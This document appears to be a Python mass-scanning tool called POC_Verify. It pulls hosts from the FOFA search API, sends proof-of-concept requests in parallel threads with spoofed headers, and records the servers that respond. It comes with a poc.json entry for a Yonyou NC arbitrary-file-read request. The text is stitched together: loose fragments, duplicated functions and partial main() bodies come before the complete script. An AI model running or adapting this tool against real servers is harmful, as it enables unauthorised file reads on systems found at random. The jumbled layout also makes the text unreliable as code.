def main():
    """Run the tool: install signal handlers, then list POCs or verify targets."""
    # Let Ctrl+C (SIGINT) and termination requests (SIGTERM) stop the program
    for signum in (signal.SIGINT, signal.SIGTERM):
        signal.signal(signum, quit)

    showpocs()

    # Collect the targets
    targetList = getTarget()

    # Verify them concurrently
    thread(targetList)

    # Report the results
    putTarget(List)
第一部分:未指定 -p 时,根据 -f 给出的 FOFA 语法搜索目标,并把结果保存到 -o 指定的文件。
第二部分:指定 -p 时,根据 -u url / -i file / -f num(FOFA 结果数目,默认为 10)获取待验证的目标。
def _fofa_hosts(query, size):
    """Run *query* against the FOFA search API and return the host of each hit.

    The request asks for the fields ``title,host,ip,port,city``; index 1 of
    every result row is therefore the host.  Network, JSON and missing-key
    errors propagate to the caller.
    """
    params = {
        "email": email,
        "key": key,
        "qbase64": base64.b64encode(query.encode("utf-8")).decode("utf-8"),
        "fields": "title,host,ip,port,city",
        "size": size,
    }
    # Passing params lets requests percent-encode them: base64 output may
    # contain '+', '/' and '=', which must not appear raw in a query string.
    res = requests.get("https://fofa.so/api/v1/search/all", params=params, timeout=30)
    results = json.loads(res.text)
    return [row[1] for row in results['results']]


def getTarget():
    """Collect the targets to verify, or run a FOFA search when no POC is given.

    Without ``-p`` the value of ``-f`` is treated as a FOFA query: the hosts
    found are written to the ``-o`` file and the program exits.

    With ``-p`` the targets come from ``-u``, the lines of the ``-i`` file and
    a FOFA search using the POC's own ``fofa`` query, where ``-f`` is the
    number of results requested.

    Returns:
        The list of target strings (only reached when ``-p`` is given).
    """
    if result.poc is None:
        # Values typed on the command line are always strings; anything else
        # is the numeric argparse default, i.e. no query was supplied.
        if not isinstance(result.fofa, str):
            sys.exit("参错有误!缺少目标!")
        if result.outfile is not None:
            print("FOFA搜索:" + result.fofa)
            try:
                hosts = _fofa_hosts(result.fofa, 30)
                with open(result.outfile, 'w') as targets:
                    for host in hosts:
                        targets.write(host + '\n')
                        print(host)
                print("搜索结果有" + str(len(hosts)) + "条,已保存在" + result.outfile + "里!")
            except Exception as e:
                # Reporting boundary: show the failure instead of a traceback
                print(e)
        sys.exit()

    if result.url is None and result.file is None and result.fofa is None:
        sys.exit("参错有误!缺少目标!")

    targetList = []

    # Single target
    if result.url is not None:
        targetList.append(result.url)

    # Targets listed in a file, one per line; blank lines are skipped
    if result.file is not None:
        try:
            with open(result.file, 'r') as targets:
                targetList.extend(line.strip() for line in targets if line.strip())
        except (OSError, UnicodeError) as e:
            print(e)

    # Targets found through FOFA with the query stored in the POC entry
    # NOTE(review): -f has a default, so this search runs even when -u/-i
    # are given — confirm that is intended.
    if result.fofa is not None:
        with open('poc.json', encoding='UTF-8') as f:
            data = json.load(f)
        # An unknown POC name is reported later by poc_load()
        if result.poc in data:
            qbase = data[result.poc]['fofa']
            try:
                hosts = _fofa_hosts(qbase, result.fofa)
                print("FOFA搜索:" + qbase)
                print("搜索结果:" + str(len(hosts)) + "条")
                targetList.extend(hosts)
            except Exception as e:
                print(e)

    return targetList
def thread(targetList):
    """Verify every target in *targetList* with a pool of worker threads.

    Loads the selected POC, queues all targets, starts ``result.threadNum``
    ``reqThread`` workers and blocks until every worker has finished.
    """
    # Load the POC definition
    poc = poc_load()

    # All targets are queued before any worker starts, so the queue must be
    # able to hold the whole list: a bounded queue would block put() forever
    # once full.  A private unbounded queue is used for that reason.
    pending = queue.Queue()
    for target in targetList:
        pending.put(target)

    # Create the workers
    workers = []
    for _ in range(result.threadNum):
        worker = reqThread(pending, poc)
        # Thread.setDaemon() is deprecated; the attribute is the supported form
        worker.daemon = True
        workers.append(worker)

    for worker in workers:
        worker.start()

    # Wait for all workers to finish
    for worker in workers:
        worker.join()
请求验证必须使用 -p pocName
# Load the POC
def poc_load():
    """Return the ``poc.json`` entry selected with ``-p``.

    Returns:
        The POC definition, or None when no POC name was given.

    Exits the program when the requested name is not present in ``poc.json``.
    """
    if result.poc is None:
        return None

    # Read the JSON file
    with open('poc.json', encoding='UTF-8') as f:
        data = json.load(f)

    if result.poc not in data:
        print("POC 不存在!")
        # The option is registered as "-show" (single dash)
        sys.exit("请通过-show查看poc列表!")
    return data[result.poc]
class reqThread(threading.Thread):
    """Worker thread that takes targets from a queue and checks each against one POC."""

    def __init__(self, q, poc):
        """Store the shared target queue *q* and the POC definition *poc*."""
        threading.Thread.__init__(self)
        self.q = q
        self.poc = poc

    def run(self):
        """Drain the queue, recording every target that ``req`` confirms."""
        while True:
            # get_nowait() cannot block: checking empty() and then calling a
            # blocking get() can hang when another worker takes the last item.
            try:
                target = self.q.get_nowait()
            except queue.Empty:
                return

            # Failures are handled per target so that one bad host does not
            # end this worker and strand the rest of the queue.
            try:
                vulnerable = self.req(target)
            except OSError:
                # requests' exceptions derive from IOError/OSError: the target
                # is unreachable, timed out or invalid — skip it quietly.
                continue
            except Exception as exc:
                # Anything else is a defect in the POC or the tool; show it.
                print(target + " check failed: " + repr(exc), file=sys.stderr)
                continue

            if vulnerable:
                print(target + " is vuln !")
                List.append(target)

    def req(self, url):
        """Send the POC request to *url* and return True when it is confirmed.

        A target counts as confirmed when the response status is 200 and the
        POC's ``confirm`` string occurs in the response body.
        """
        request = self.poc['request']
        payload = urlParse(url) + request['url']
        res = requests.request(
            method=request['method'],
            url=payload,
            headers=randomHeaders(self.poc),
            proxies=getProxy(),
            data=request['data'],
            verify=False,
            timeout=5,
        )
        return res.status_code == 200 and request['confirm'] in res.text
# Normalize a target URL
def urlParse(url):
    """Return *url* with an explicit scheme, defaulting to ``http://``.

    Targets that already start with ``http://`` or ``https://`` (in any
    letter case) are returned unchanged; anything else gets ``http://``
    prepended.
    """
    # Test the prefix, not a substring: a bare host whose path or query embeds
    # another URL (e.g. "host/?next=http://x") still needs a scheme.
    if url.lower().startswith(("http://", "https://")):
        return url
    return "http://" + url
# Normalize a target URL (this function does not deal with proxies)
def urlParse(url):
    """Return *url* with an explicit scheme, defaulting to ``http://``.

    Targets that already start with ``http://`` or ``https://`` (in any
    letter case) are returned unchanged; anything else gets ``http://``
    prepended.
    """
    # Test the prefix, not a substring: a bare host whose path or query embeds
    # another URL (e.g. "host/?next=http://x") still needs a scheme.
    if url.lower().startswith(("http://", "https://")):
        return url
    return "http://" + url
def randomHeaders(poc):
    """Build the request headers for *poc*.

    ``User-Agent``, ``referer`` and ``X-Forwarded-For`` are only emitted when
    the POC lists them under ``poc['request']['headers']``.  A non-blank
    value is used as is; a blank one is replaced by a random entry from the
    matching pool below.  Every other header of the POC is copied unchanged.

    Returns:
        A new dict of header names to values.
    """
    uaList = [
        'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.100 Safari/537.36',
        'Mozilla/5.0 (iPhone; CPU iPhone OS 13_3_1 like Mac OS X; zh-CN) AppleWebKit/537.51.1 (KHTML, like Gecko) Mobile/17D50 UCBrowser/ Mobile AliApp(TUnionSDK/',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.116 Safari/537.36',
        'Mozilla/5.0 (Linux; Android 8.1.0; OPPO R11t Build/OPM1.171019.011; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/76.0.3809.89 Mobile Safari/537.36 T7/11.19 SP-engine/2.15.0 baiduboxapp/ (Baidu; P1 8.1.0)',
        'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36',
        'Mozilla/5.0 (iPhone; CPU iPhone OS 13_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 SP-engine/2.14.0 main%2F1.0 baiduboxapp/ (Baidu; P2 13.3.1) NABar/0.0',
        'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134',
        'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36',
        'Mozilla/5.0 (iPhone; CPU iPhone OS 12_4_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 MicroMessenger/7.0.10(0x17000a21) NetType/4G Language/zh_CN',
        'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36',
        'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36',
        'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36',
        'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.108 Safari/537.36',
        'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36',
        'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.106 Safari/537.36',
    ]
    refList = [
        "www.baidu.com"
    ]
    # NOTE(review): every entry is an empty string here — presumably these
    # are meant to be IP addresses; confirm and fill in.
    xffList = [
        '', '', '', '', '', '', '', '', '', '', '', '', ''
    ]

    configured = poc['request']['headers']
    headers = {}

    # Each randomizable header is judged by its OWN configured value.  (The
    # X-Forwarded-For decision used to look at the User-Agent value.)
    pools = (
        ('User-Agent', uaList),
        ('referer', refList),
        ('X-Forwarded-For', xffList),
    )
    for name, pool in pools:
        if name not in configured:
            continue
        value = configured[name]
        headers[name] = value if value.strip() != '' else random.choice(pool)

    # Copy the remaining POC headers verbatim
    for name, value in configured.items():
        if name not in ("referer", "User-Agent", "X-Forwarded-For"):
            headers[name] = value
    return headers
List = []


## Output
def putTarget(resultList):
    """Save the confirmed targets in *resultList* to the ``-o`` file.

    Nothing happens unless targets came from a file or from FOFA.  An empty
    list only prints a notice; otherwise each target is written on its own
    line and a summary is printed.
    """
    if result.file is None and result.fofa is None:
        return

    if not resultList:
        print("没有发现存在漏洞的目标!")
        return

    if result.outfile is None:
        return

    destination = result.outfile
    with open(destination, 'w') as out:
        out.writelines(entry + '\n' for entry in resultList)
    print("验证结果有" + str(len(resultList)) + "条,已保存在" + destination + "里!")
# Silence the warning urllib3 emits for HTTPS requests made with verify=False
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

## Queue of targets waiting to be verified.
## Unbounded on purpose: every target is queued before any worker thread
## starts, so a size limit would make put() block forever once it is reached.
targetQueue = queue.Queue()

## Lock shared by the code that fills and drains the queue
queueLock = threading.Lock()

# Targets confirmed as vulnerable
List = []

# FOFA API credentials, sent as the "email" and "key" query parameters
email = ""
key = ""
# Command-line options as (flags, add_argument keyword arguments), in the
# order they appear in the help output.
_OPTIONS = (
    (('-u',), dict(dest='url', help='Target URL', type=str)),
    (('-i', '--file'), dict(dest='file', help='Scan multiple targets given in a textual file', type=str)),
    (('-f', '--fofa'), dict(dest='fofa', help='fofaquery Nums/String Example if poc -f 10 else -f "abc" default=30', default=10)),
    (('-p',), dict(dest='poc', help=' Load POC file from poc.json')),
    (('-proxy',), dict(dest='proxy', help='Use a proxy to connect to the target URL Example : -proxy http:', type=str)),
    (('-t',), dict(dest='threadNum', help='the thread_count,default=10', type=int, default=10)),
    (('-show',), dict(dest='show', help='show all pocs', nargs='?', const='all', type=str)),
    (('-o', '--outfile'), dict(dest='outfile', help='the file save result', default='result.txt', type=str)),
)

arg = ArgumentParser(description='POC_Verify')
for _flags, _settings in _OPTIONS:
    arg.add_argument(*_flags, **_settings)

# Parsed options, read by the rest of the script
result = arg.parse_args()
## Show POCs
def showpocs():
    """Handle ``-show``: list POCs from ``poc.json`` and exit.

    Does nothing when ``-show`` was not given.  ``-show`` alone (value
    ``"all"``) lists every POC; ``-show NAME`` lists only that entry.  The
    program exits afterwards in both cases, and exits with an error message
    when NAME is not in ``poc.json``.
    """
    if result.show is None:
        return

    # Read the JSON file
    with open('poc.json', encoding='UTF-8') as f:
        data = json.load(f)

    if result.show == "all":
        names = list(data)
    elif result.show in data:
        names = [result.show]
    else:
        # Say why nothing is listed instead of exiting silently
        sys.exit("POC 不存在!")

    print("pocname".ljust(20), "description".ljust(20))
    print("----------------------------------------------")
    for name in names:
        print(name.ljust(20), data[name]['name'].ljust(20))
    sys.exit()
# Stop the program
def quit(signum, frame):
    """Signal handler: announce the stop and exit.

    Args:
        signum: Number of the signal that was received.
        frame: Interrupted stack frame (unused).

    Raises:
        SystemExit: always, with status ``128 + signum`` so that callers can
            tell an interrupted run from one that completed.
    """
    print('You choose to stop me.')
    sys.exit(128 + signum)


def main():
    # Stop the program on Ctrl+C (SIGINT) or a termination request (SIGTERM)
    signal.signal(signal.SIGINT, quit)
    signal.signal(signal.SIGTERM, quit)
{ "pocname": { "name":"漏洞描述", "fofa":"fofa搜索字符串,特殊符号需要转义", "request": { "method": "", "url":"", "headers": { "referer": "", "User-Agent": "", "X-Forwarded-For": "", "Content-Type": "" }, "data": "", "confirm": "回显字符串" } }, "yonyounc": { "name": "用友NC 任意文件读取", "fofa":"app=\"用友-UFIDA-NC\"", "request": { "method": "get", "url": "/NCFindWeb?service=IPreAlertConfigService&filename=index.jsp", "headers": { "referer": "", "User-Agent": "", "X-Forwarded-For": "" }, "data": "", "confirm": "<%@ page language=" } } }
"""POC_Verify: check targets against a POC described in poc.json."""

import base64
import json
import queue
import random
import signal
import sys
import threading
import time
from argparse import ArgumentParser

import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning

# Silence the warning urllib3 emits for HTTPS requests made with verify=False
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

## Queue of targets waiting to be verified.
## Unbounded on purpose: every target is queued before any worker thread
## starts, so a size limit would make put() block forever once it is reached.
targetQueue = queue.Queue()

## Lock held while the queue is being filled
queueLock = threading.Lock()

# Targets confirmed as vulnerable
List = []

# FOFA API credentials, sent as the "email" and "key" query parameters
email = ""
key = ""

arg = ArgumentParser(description='POC_Verify')
arg.add_argument('-u', dest='url', help='Target URL', type=str)
arg.add_argument('-i', '--file', dest='file', help='Scan multiple targets given in a textual file', type=str)
arg.add_argument('-f', "--fofa", dest='fofa', help='fofaquery Nums/String Example if poc -f 10 else -f "abc" default=30', default=10)
arg.add_argument('-p', dest='poc', help=' Load POC file from poc.json')
arg.add_argument('-proxy', dest='proxy', help='Use a proxy to connect to the target URL Example : -proxy http:', type=str)
arg.add_argument('-t', dest='threadNum', help='the thread_count,default=10', type=int, default=10)
arg.add_argument('-show', dest='show', help='show all pocs', nargs='?', const='all', type=str)
arg.add_argument('-o', '--outfile', dest='outfile', help='the file save result', default='result.txt', type=str)
result = arg.parse_args()


class reqThread(threading.Thread):
    """Worker thread that takes targets from a queue and checks each against one POC."""

    def __init__(self, q, poc):
        """Store the shared target queue *q* and the POC definition *poc*."""
        threading.Thread.__init__(self)
        self.q = q
        self.poc = poc

    def run(self):
        """Drain the queue, recording every target that ``req`` confirms."""
        while True:
            # get_nowait() cannot block: checking empty() and then calling a
            # blocking get() can hang when another worker takes the last item.
            try:
                target = self.q.get_nowait()
            except queue.Empty:
                return

            # Failures are handled per target so that one bad host does not
            # end this worker and strand the rest of the queue.
            try:
                vulnerable = self.req(target)
            except OSError:
                # requests' exceptions derive from IOError/OSError: the target
                # is unreachable, timed out or invalid — skip it quietly.
                continue
            except Exception as exc:
                # Anything else is a defect in the POC or the tool; show it.
                print(target + " check failed: " + repr(exc), file=sys.stderr)
                continue

            if vulnerable:
                print(target + " is vuln !")
                List.append(target)

    def req(self, url):
        """Send the POC request to *url* and return True when it is confirmed.

        A target counts as confirmed when the response status is 200 and the
        POC's ``confirm`` string occurs in the response body.
        """
        request = self.poc['request']
        payload = urlParse(url) + request['url']
        res = requests.request(
            method=request['method'],
            url=payload,
            headers=randomHeaders(self.poc),
            proxies=getProxy(),
            data=request['data'],
            verify=False,
            timeout=5,
        )
        return res.status_code == 200 and request['confirm'] in res.text


## Proxy
def getProxy():
    """Return the ``proxies`` mapping for requests built from ``-proxy``.

    The option value is split at its first ``:``; the part before it becomes
    the mapping key and the part after it the value.  Returns an empty dict
    when no proxy was given.

    Raises:
        ValueError: if the option value contains no ``:``.
    """
    proxy = {}
    if result.proxy is not None:
        # NOTE(review): for "http://host:port" this stores "//host:port"
        # under "http" only — confirm the expected -proxy format.
        split_at = result.proxy.index(":")
        proxy[result.proxy[:split_at]] = result.proxy[split_at + 1:]
    return proxy


# Normalize a target URL
def urlParse(url):
    """Return *url* with an explicit scheme, defaulting to ``http://``.

    Targets that already start with ``http://`` or ``https://`` (in any
    letter case) are returned unchanged; anything else gets ``http://``
    prepended.
    """
    # Test the prefix, not a substring: a bare host whose path or query embeds
    # another URL (e.g. "host/?next=http://x") still needs a scheme.
    if url.lower().startswith(("http://", "https://")):
        return url
    return "http://" + url


# Randomize User-Agent, X-Forwarded-For and referer
def randomHeaders(poc):
    """Build the request headers for *poc*.

    ``User-Agent``, ``referer`` and ``X-Forwarded-For`` are only emitted when
    the POC lists them under ``poc['request']['headers']``.  A non-blank
    value is used as is; a blank one is replaced by a random entry from the
    matching pool below.  Every other header of the POC is copied unchanged.

    Returns:
        A new dict of header names to values.
    """
    uaList = [
        'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.100 Safari/537.36',
        'Mozilla/5.0 (iPhone; CPU iPhone OS 13_3_1 like Mac OS X; zh-CN) AppleWebKit/537.51.1 (KHTML, like Gecko) Mobile/17D50 UCBrowser/ Mobile AliApp(TUnionSDK/',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.116 Safari/537.36',
        'Mozilla/5.0 (Linux; Android 8.1.0; OPPO R11t Build/OPM1.171019.011; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/76.0.3809.89 Mobile Safari/537.36 T7/11.19 SP-engine/2.15.0 baiduboxapp/ (Baidu; P1 8.1.0)',
        'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36',
        'Mozilla/5.0 (iPhone; CPU iPhone OS 13_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 SP-engine/2.14.0 main%2F1.0 baiduboxapp/ (Baidu; P2 13.3.1) NABar/0.0',
        'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134',
        'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36',
        'Mozilla/5.0 (iPhone; CPU iPhone OS 12_4_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 MicroMessenger/7.0.10(0x17000a21) NetType/4G Language/zh_CN',
        'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36',
        'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36',
        'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36',
        'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.108 Safari/537.36',
        'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36',
        'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.106 Safari/537.36',
    ]
    refList = [
        "www.baidu.com"
    ]
    # NOTE(review): every entry is an empty string here — presumably these
    # are meant to be IP addresses; confirm and fill in.
    xffList = [
        '', '', '', '', '', '', '', '', '', '', '', '', ''
    ]

    configured = poc['request']['headers']
    headers = {}

    # Each randomizable header is judged by its OWN configured value.  (The
    # X-Forwarded-For decision used to look at the User-Agent value.)
    pools = (
        ('User-Agent', uaList),
        ('referer', refList),
        ('X-Forwarded-For', xffList),
    )
    for name, pool in pools:
        if name not in configured:
            continue
        value = configured[name]
        headers[name] = value if value.strip() != '' else random.choice(pool)

    # Copy the remaining POC headers verbatim
    for name, value in configured.items():
        if name not in ("referer", "User-Agent", "X-Forwarded-For"):
            headers[name] = value
    return headers


def _fofa_hosts(query, size):
    """Run *query* against the FOFA search API and return the host of each hit.

    The request asks for the fields ``title,host,ip,port,city``; index 1 of
    every result row is therefore the host.  Network, JSON and missing-key
    errors propagate to the caller.
    """
    params = {
        "email": email,
        "key": key,
        "qbase64": base64.b64encode(query.encode("utf-8")).decode("utf-8"),
        "fields": "title,host,ip,port,city",
        "size": size,
    }
    # Passing params lets requests percent-encode them: base64 output may
    # contain '+', '/' and '=', which must not appear raw in a query string.
    res = requests.get("https://fofa.so/api/v1/search/all", params=params, timeout=30)
    results = json.loads(res.text)
    return [row[1] for row in results['results']]


# Collect the targets
def getTarget():
    """Collect the targets to verify, or run a FOFA search when no POC is given.

    Without ``-p`` the value of ``-f`` is treated as a FOFA query: the hosts
    found are written to the ``-o`` file and the program exits.

    With ``-p`` the targets come from ``-u``, the lines of the ``-i`` file and
    a FOFA search using the POC's own ``fofa`` query, where ``-f`` is the
    number of results requested.

    Returns:
        The list of target strings (only reached when ``-p`` is given).
    """
    if result.poc is None:
        # Values typed on the command line are always strings; anything else
        # is the numeric argparse default, i.e. no query was supplied.
        if not isinstance(result.fofa, str):
            sys.exit("参错有误!缺少目标!")
        if result.outfile is not None:
            print("FOFA搜索:" + result.fofa)
            try:
                hosts = _fofa_hosts(result.fofa, 30)
                with open(result.outfile, 'w') as targets:
                    for host in hosts:
                        targets.write(host + '\n')
                        print(host)
                print("搜索结果有" + str(len(hosts)) + "条,已保存在" + result.outfile + "里!")
            except Exception as e:
                # Reporting boundary: show the failure instead of a traceback
                print(e)
        sys.exit()

    if result.url is None and result.file is None and result.fofa is None:
        sys.exit("参错有误!缺少目标!")

    targetList = []

    # Single target
    if result.url is not None:
        targetList.append(result.url)

    # Targets listed in a file, one per line; blank lines are skipped
    if result.file is not None:
        try:
            with open(result.file, 'r') as targets:
                targetList.extend(line.strip() for line in targets if line.strip())
        except (OSError, UnicodeError) as e:
            print(e)

    # Targets found through FOFA with the query stored in the POC entry
    # NOTE(review): -f has a default, so this search runs even when -u/-i
    # are given — confirm that is intended.
    if result.fofa is not None:
        with open('poc.json', encoding='UTF-8') as f:
            data = json.load(f)
        # An unknown POC name is reported later by poc_load()
        if result.poc in data:
            qbase = data[result.poc]['fofa']
            try:
                hosts = _fofa_hosts(qbase, result.fofa)
                print("FOFA搜索:" + qbase)
                print("搜索结果:" + str(len(hosts)) + "条")
                targetList.extend(hosts)
            except Exception as e:
                print(e)

    return targetList


# Load the POC
def poc_load():
    """Return the ``poc.json`` entry selected with ``-p``.

    Returns:
        The POC definition, or None when no POC name was given.

    Exits the program when the requested name is not present in ``poc.json``.
    """
    if result.poc is None:
        return None

    # Read the JSON file
    with open('poc.json', encoding='UTF-8') as f:
        data = json.load(f)

    if result.poc not in data:
        print("POC 不存在!")
        # The option is registered as "-show" (single dash)
        sys.exit("请通过-show查看poc列表!")
    return data[result.poc]


## Output
def putTarget(resultList):
    """Save the confirmed targets in *resultList* to the ``-o`` file.

    Nothing happens unless targets came from a file or from FOFA.  An empty
    list only prints a notice; otherwise each target is written on its own
    line and a summary is printed.
    """
    if result.file is None and result.fofa is None:
        return

    if not resultList:
        print("没有发现存在漏洞的目标!")
        return

    if result.outfile is None:
        return

    filepath = result.outfile
    with open(filepath, 'w') as targets:
        targets.writelines(target + '\n' for target in resultList)
    print("验证结果有" + str(len(resultList)) + "条,已保存在" + filepath + "里!")


## Show POCs
def showpocs():
    """Handle ``-show``: list POCs from ``poc.json`` and exit.

    Does nothing when ``-show`` was not given.  ``-show`` alone (value
    ``"all"``) lists every POC; ``-show NAME`` lists only that entry.  The
    program exits afterwards in both cases, and exits with an error message
    when NAME is not in ``poc.json``.
    """
    if result.show is None:
        return

    # Read the JSON file
    with open('poc.json', encoding='UTF-8') as f:
        data = json.load(f)

    if result.show == "all":
        names = list(data)
    elif result.show in data:
        names = [result.show]
    else:
        # Say why nothing is listed instead of exiting silently
        sys.exit("POC 不存在!")

    print("pocname".ljust(20), "description".ljust(20))
    print("----------------------------------------------")
    for name in names:
        print(name.ljust(20), data[name]['name'].ljust(20))
    sys.exit()


# Stop the program
def quit(signum, frame):
    """Signal handler: announce the stop and exit.

    Args:
        signum: Number of the signal that was received.
        frame: Interrupted stack frame (unused).

    Raises:
        SystemExit: always, with status ``128 + signum`` so that callers can
            tell an interrupted run from one that completed.
    """
    print('You choose to stop me.')
    sys.exit(128 + signum)


def thread(targetList):
    """Verify every target in *targetList* with a pool of worker threads.

    Loads the selected POC, queues all targets, starts ``result.threadNum``
    ``reqThread`` workers and blocks until every worker has finished.
    """
    # Load the POC definition
    poc = poc_load()

    # Fill the queue; the with-statement releases the lock even if put() fails
    with queueLock:
        for target in targetList:
            targetQueue.put(target)

    # Create the workers
    threadList = []
    for _ in range(result.threadNum):
        t = reqThread(targetQueue, poc)
        # Thread.setDaemon() is deprecated; the attribute is the supported form
        t.daemon = True
        threadList.append(t)

    for t in threadList:
        t.start()

    # Wait for all workers to finish
    for t in threadList:
        t.join()


def main():
    """Run the tool: install signal handlers, then list POCs or verify targets."""
    # Stop the program on Ctrl+C (SIGINT) or a termination request (SIGTERM)
    signal.signal(signal.SIGINT, quit)
    signal.signal(signal.SIGTERM, quit)

    showpocs()

    # Collect the targets
    targetList = getTarget()

    # Verify them concurrently
    thread(targetList)

    # Report the results
    putTarget(List)


if __name__ == '__main__':
    main()
